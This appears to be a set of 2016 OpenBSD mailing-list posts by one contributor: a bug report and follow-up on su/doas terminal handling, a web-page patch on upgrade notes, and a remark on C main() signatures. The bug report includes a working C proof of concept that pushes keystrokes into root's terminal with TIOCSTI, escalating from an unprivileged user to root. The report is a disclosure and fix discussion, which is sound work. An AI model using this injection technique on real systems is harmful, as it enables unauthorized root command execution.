Re: Unexpected behavior in su/doas
On Sat, Oct 01, 2016 at 03:54:40PM -0600, Theo de Raadt wrote: > De-escalation using these "sudo" or "doas" like tools on a tty is > somewhat unsafe - it has always been unsafe - because tty's have > capabilities. Until looking into this issue I was totally unaware of the possible implications (even though they are obvious when you start thinking about it) and I guess I'm not alone. I think we should document the fact that using those tools for de-escalation is not safe in the su/doas/sudo man pages. > If you wish to be safer, do these operations without retaining access > to a tty. Are there tools available for this task? I could use SSH, but that only works for unlocked accounts with a password/ssh-key. > Escalation on the other hand (user -> root) is different, because then > it is clear you want to do more / everything. But de-escalation is a > joke. > > This is just one mechanism on tty, there are others. On other > descriptors there are other abilities. sudo provides the use_pty option (sadly not by default) which spawns a new session with a new controlling TTY and then forwards the input to the original tty (similar to what SSH does - just without the network). This way the unprivileged process never has any access to the privileged terminal which prevents this attack. Would it be useful to add a similar feature (per default) to su/doas or are there downsides or other possible attacks with this approach? Regards Simon -- + privacy is necessary + using gnupg http://gnupg.org + public key id: 0x92FEFDB7E44C32F9 signature.asc Description: PGP signature
Unexpected behavior in su/doas
Hello,
I stumbled upon unexpected behavior on OpenBSD 6.0 (all patches)
which seems to allow running commands as the original user when
using su and doas interactively because the controlling terminal
is the same.
The following binary is used to test this and compiled as
/tmp/a.out:
#include
#include
char s[] = "echo Payload as $(whoami)\n";
void main(void) {
printf("uid: %d\n", getuid());
char *c = s;
int i = 0;
int tty = open("/dev/tty", 0);
do {
ioctl(tty, TIOCSTI, c);
c++;
} while (*c);
return;
}
Now running su builder -c /tmp/a.out (where builder is just a
normal user with a shell) results in:
# su builder -c /tmp/a.out
uid: 1000
echo Payload as $(whoami)
# echo Payload as $(whoami)
Payload as root
Similar happens with doas and the following config:
# cat /etc/doas.conf
permit nopass root as builder
# doas -u builder /tmp/a.out
uid: 1000
echo Payload as $(whoami)
# echo Payload as $(whoami)
Payload as root
Is this behavior expected and if so, how do I run commands from
root as an untrusted user? It's not mentioned in the man page
that using su/doas as root might allow other users to run code as
root.
Similar behavior is also mentioned in an old (and unfixed) Debian
bug [1].
Regards
Simon
[1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=628843
--
+ privacy is necessary
+ using gnupg http://gnupg.org
+ public key id: 0x92FEFDB7E44C32F9
signature.asc
Description: PGP signature
Re: [PATCH] www: mention /usr/src in upgrade notes
On Mon, Sep 19, 2016 at 07:25:08PM -0700, Philip Guenther wrote: > Listing what something *doesn't* do is generally a bad plan, because > the list has no end, so where to draw the line becomes a matter of > opinion. Better to list what the installer does update and say that's > the complete list, and then perhaps "Anything else previously > installed will need to be updated separately." Sounds fine to me. Regards Simon -- + privacy is necessary + using gnupg http://gnupg.org + public key id: 0x92FEFDB7E44C32F9 signature.asc Description: PGP signature
Re: [PATCH] www: mention /usr/src in upgrade notes
On Mon, Sep 19, 2016 at 03:00:40AM +0200, Theo Buehler wrote: > On Mon, Sep 19, 2016 at 01:59:20AM +0200, Simon Ruderich wrote: >> I'm a relatively new OpenBSD user and just updated my system from >> 5.9 to 6.0 but forgot to update the files in /usr/src. Thus when >> I applied the latest patches (001-006) I actually built an old >> 5.9 kernel which failed to boot. The following patch mentions >> /usr/src in the upgrade notes. > > Thanks a lot for taking the time and submitting a patch. I will need to > think about this a little. I will probably end up adding a link to > errata.html since that is a more glaring omission on that page. Hello, I saw the addition of the errata and stable links. I think that's an improvement, thanks. However I still would like to see a quick note telling the user that he should remember to update all source-based data because the installer won't do it for them . Maybe something like "The installer doesn't automatically update source files, for example in /usr/src". Regards Simon -- + privacy is necessary + using gnupg http://gnupg.org + public key id: 0x92FEFDB7E44C32F9 signature.asc Description: PGP signature
[PATCH] www: mention /usr/src in upgrade notes
Hello, I'm a relatively new OpenBSD user and just updated my system from 5.9 to 6.0 but forgot to update the files in /usr/src. Thus when I applied the latest patches (001-006) I actually built an old 5.9 kernel which failed to boot. The following patch mentions /usr/src in the upgrade notes. Regards Simon Index: upgrade60.html === RCS file: /cvs/www/faq/upgrade60.html,v retrieving revision 1.11 diff -u -r1.11 upgrade60.html --- upgrade60.html 14 Sep 2016 15:53:09 - 1.11 +++ upgrade60.html 18 Sep 2016 23:55:55 - @@ -41,7 +41,8 @@ boot loader to boot this kernel. Once this kernel is booted, choose the (U)pgrade option and follow the prompts. -Finish up by upgrading the packages: pkg_add -u. +Finish up by upgrading the packages: pkg_add -u. Don't forget +to update /usr/src if you're using it to build from source. Alternatively, you can use the manual upgrade process. -- + privacy is necessary + using gnupg http://gnupg.org + public key id: 0x92FEFDB7E44C32F9 signature.asc Description: PGP signature
Re: does true.c need command line arguments?
On Mon, Jul 04, 2016 at 03:04:32PM -0600, Theo de Raadt wrote: > Because main() is specified to take those arguments. For what it's worth, the C-standard [1] specifies both versions: int main(void) and int main(int argc, char *argv[]). Regards Simon [1]: C11-draft, section 5.1.2.2.1 -- + privacy is necessary + using gnupg http://gnupg.org + public key id: 0x92FEFDB7E44C32F9 signature.asc Description: PGP signature
